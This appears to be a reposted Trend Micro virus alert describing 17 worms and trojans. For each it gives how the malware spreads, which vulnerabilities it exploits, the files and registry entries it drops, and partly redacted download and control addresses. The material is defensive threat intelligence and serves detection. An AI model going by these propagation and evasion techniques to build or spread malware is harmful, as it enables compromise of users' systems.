[Virus Alert] 17 new worms found
Worm name: WORM_FEEBS.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm spreads through peer-to-peer (P2P) file-sharing applications. It uses different file names, which are related to various applications, to entice P2P users to download copies of itself.
Upon execution, it drops a copy of itself as MS{Random}.EXE in the Windows system folder. Its use of the MS affixed to a random file name may trick unsuspecting users into thinking that it is a legitimate Windows file.
It disables the Windows firewall by creating several registry entries. This action allows remote malicious users to connect to and from the affected system and perform malicious activities without the user's knowledge.
Worm name: WORM_SDBOT.CWG
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This particular WORM_SDBOT variant is Trend Micro's detection for the "Santa worm" malware that is currently spreading in the wild.
It takes advantage of the following Windows vulnerabilities to propagate across networks:
• ASN.1 vulnerability
• Windows Plug and Play vulnerability
The said vulnerabilities are discussed in detail on the following Web pages:
• Microsoft Security Bulletin MS04-007
• Microsoft Security Bulletin MS05-039
The propagation via the Microsoft Windows Plug and Play vulnerability, however, works only on Windows NT and 2000 because the said vulnerability has inherent characteristics that prevent this worm from exploiting the vulnerability on Windows XP and Server 2003.
Upon execution, it drops a copy of itself as WINRPC.EXE in the Windows folder.
Worm name: ELF_KAIGENT.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident worm is part of a BotNet distributor that exploits a known vulnerability in Mambo. Mambo is an open source content management system commonly used in LINUX platforms.
A BotNet is a network of computers that are remotely controlled for usually malicious activities, such as spamming or spyware distribution. The said routine is usually done transparent to the computer owner.
The BotNet distribution starts when this worm attempts to exploit the Mambo vulnerability. If successful, this worm then downloads a script, detected by Trend Micro as PHP_DEFTOOL.A, which in turn downloads the script micu from the address 209.{BLOCKED}.48.69/micu.
Worm name: SYMBOS_CABIR.M
Risk rating: MEDIUM
Damage Potential: MEDIUM
Distribution Potential: MEDIUM
Description:
This malware propagates via Bluetooth. It may also be downloaded from the Internet. It uses the name Norton Antivirus Symbian v1.0sis to trick unsuspecting users into accepting the file and executing it onto their phones.
This malware infects mobile phones running the Symbian OS with the Series 60 Platform user interface.
Worm name: TROJ_BAGLE.GP
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to mass-mailed email messages of WORM_BAGLE.GP.
Once a user executes the said attachment, it drops its copy on the affected machine. Presence of the file ANTI_TROJ.EXE indicates infection.
It looks for the legitimate Windows file NTIMAGE.GIF, which it displays using the default image viewer, in the Windows system folder of affected machines. It does the said routine to make it appear that the execution of this Trojan's dropped file only opens the said .GIF file.
Worm name: ELF_MARE.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) propagates by taking advantage of the PHP-Nuke admin_styles.php phpbb_root_path vulnerability, which allows a malicious user to execute remote commands on a system.
It drops and executes a UNIX script file, which Trend Micro detects as UNIX_MARE.B, into the affected machine. The UNIX script file then downloads a copy of a worm and another malware detected by Trend Micro as ELF_KAITEN.P.
Currently, there are no known upgrades, patches, or workarounds available to correct the issue regarding the PHP-Nuke exploit.
Worm name: ELF_KAITEN.P
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) is usually downloaded and executed by another malware detected by Trend Micro as UNIX_MARE.B.
Upon execution, it uses an Internet Relay Chat (IRC) client to connect to a specific IRC server and joins a particular IRC channel.
It waits for malicious commands, such as to terminate processes and to download files, from a remote user. It performs the said commands on the machine, thus compromising system security.
Worm name: WORM_BAGLE.GP
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm usually arrives as a downloaded file of TROJ_BAGLE.GP.
Upon execution, this worm drops a copy of itself as wind2ll2.exe in the Windows system folder. It creates registry entries in an attempt to execute at every system startup. However, its autostart mechanism fails to work.
This worm attaches a copy of TROJ_BAGLE.GP to email messages it sends to addresses found on an affected system's Windows Address Book (WAB). When executed, this Trojan downloads a copy of this worm from several sites.
Worm name: TROJ_BAGLE.GS
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Trojan usually arrives as a downloaded file of another malware, which Trend Micro detects as TROJ_BAGLE.GR.
Upon execution, this memory-resident Trojan drops the files WINLOG.EXE and WINLOG.DLL into the Windows system folder.
It terminates processes, disables services, and prevents access to Web sites related to antivirus and security applications. The said routines elevates the affected system's risk of being affected with other malware programs.
Worm name: WORM_BAGLE.GY
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm usually arrives as a downloaded file of other malware programs. Upon execution, it drops a copy of itself as wind2ll2.exe in the Windows system folder.
It creates registry keys in an attempt to run at every system startup. However, its autostart mechanism fails to work.
It connects to a list of Web sites, where it acquires files that may download copies of this worm. It also downloads lists of predefined email addresses that this worm may use as recipients of its email messages.
Worm name: TROJ_BAGLE.GR
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to mass-mailed email messages.
Once a user executes the said attachment, it drops its copy on the affected machine. Presence of the file ANTI_TROJ.EXE indicates infection.
It looks for the legitimate Windows file NTIMAGE.GIF, which it displays using the default image viewer, in the Windows system folder of affected machines. It does the said routine to make it appear that the execution of this Trojan's dropped file only opens the said .GIF file.
Worm name: ELF_KAIGENT.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) is part of a botnet distributor that takes advantage of the following vulnerabilities:
• AWStats Remote Command Execution vulnerability
• Mambo "mosConfig_absolute_path" Remote File Inclusion vulnerability
A botnet is a network of computers that are remotely controlled for usually malicious activities, such as spamming or spyware distribution. The said routine is usually done transparent to the computer owner.
When the mentioned vulnerabilities are successfully exploited, this ELF attempts to download from the URL, http:// 216.{BLOCKED}09.12/listen. The said URL is inaccessible as of this writing.
Worm name: ELF_KAIGENT.C
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This executable Linux file (ELF) is part of a botnet distributor that takes advantage of the following vulnerability:
This vulnerability allows a remote attacker to execute arbitrary commands. This routine is allowed to take place by admin_styles.php, which does not properly clean or reset a user's previous input to the phpbb_root_path variable. As a result, the remote attacker can include a file from a remote host that contains arbitrary commands. These commands are then executed by the vulnerable script.
A botnet is a network of computers that are remotely controlled for usually malicious activities, such as spamming or spyware distribution. The said routine is usually done transparent to the computer owner.
Worm name: WORM_BAGLE.BY
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm propagates via email messages. It first downloads a certain file, which contains a list of target recipients, from a number of Web sites. A copy of this worm is then sent out as an attachment to the email messages that are spammed to the said target recipients.
The mentioned downloaded file may change its contents from time to time. As of this writing, however, the Web sites that this worm attempts to access for its downloading routine are all inaccessible.
It opens TCP port 80 to listen in for incoming connections from a remote malicious user. Once it establishes a connection, it acts as a backdoor that allows the said remote user to issue certain commands locally on an affected machine. In addition, through its backdoor capabilities, it is able to set up the affected system as a Web server, which a remote user can use to upload or download a possibly malicious file.
Worm name: JS_FEEBS.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This malicious JavaScript arrives on a system as a downloaded file from the Internet.
When installed, it drops the file command.exe, which Trend Micro detects as WORM_FEEBS.A. Thus, a system infected with JS_FEEBS.A may also be infected with yet another malware, causing even more harm on the system.
It creates an autostart registry entry for its dropped malware. If this JavaScript fails to create the said registry entry, it copies the file command.exe to the startup folder by retrieving the startup folder path from a specific registry key. It then proceeds to execute the said file.
By copying the said file to the startup folder, this malicious JavaScript ensures its dropped malware's automatic execution at every system startup.
Worm name: TROJ_BAGLE.GT
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to mass-mailed email messages.
Once a user executes the said attachment, it drops its copy on the affected machine. Presence of the file ANTI_TROJ.EXE indicates infection.
It looks for the legitimate Windows file NTIMAGE.GIF, which it displays using the default image viewer, in the Windows system folder of affected machines. It does the said routine to make it appear that the execution of this Trojan's dropped file only opens the said .GIF file.
Worm name: WORM_VIRKEL.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident worm spreads via MSN Messenger. It sends an instant message to all online contacts of an affected user. The message it sends contains the following link:
msg{BLOCKED}beta8.com/im.php recipient's email address}
Once a recipient clicks on the said link, a copy of the worm is downloaded on the system.
Since the message comes from a known source, target recipients may accept the message as trustworthy and unsuspectingly install this worm. Users are advised to be wary of clicking links contained in instant messages from their contacts, unless confirmation is received that the links are valid and non-malicious.
References: http://www.trendmicro.com/vinfo/ (TrendMirco Virus Security Info)
http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info
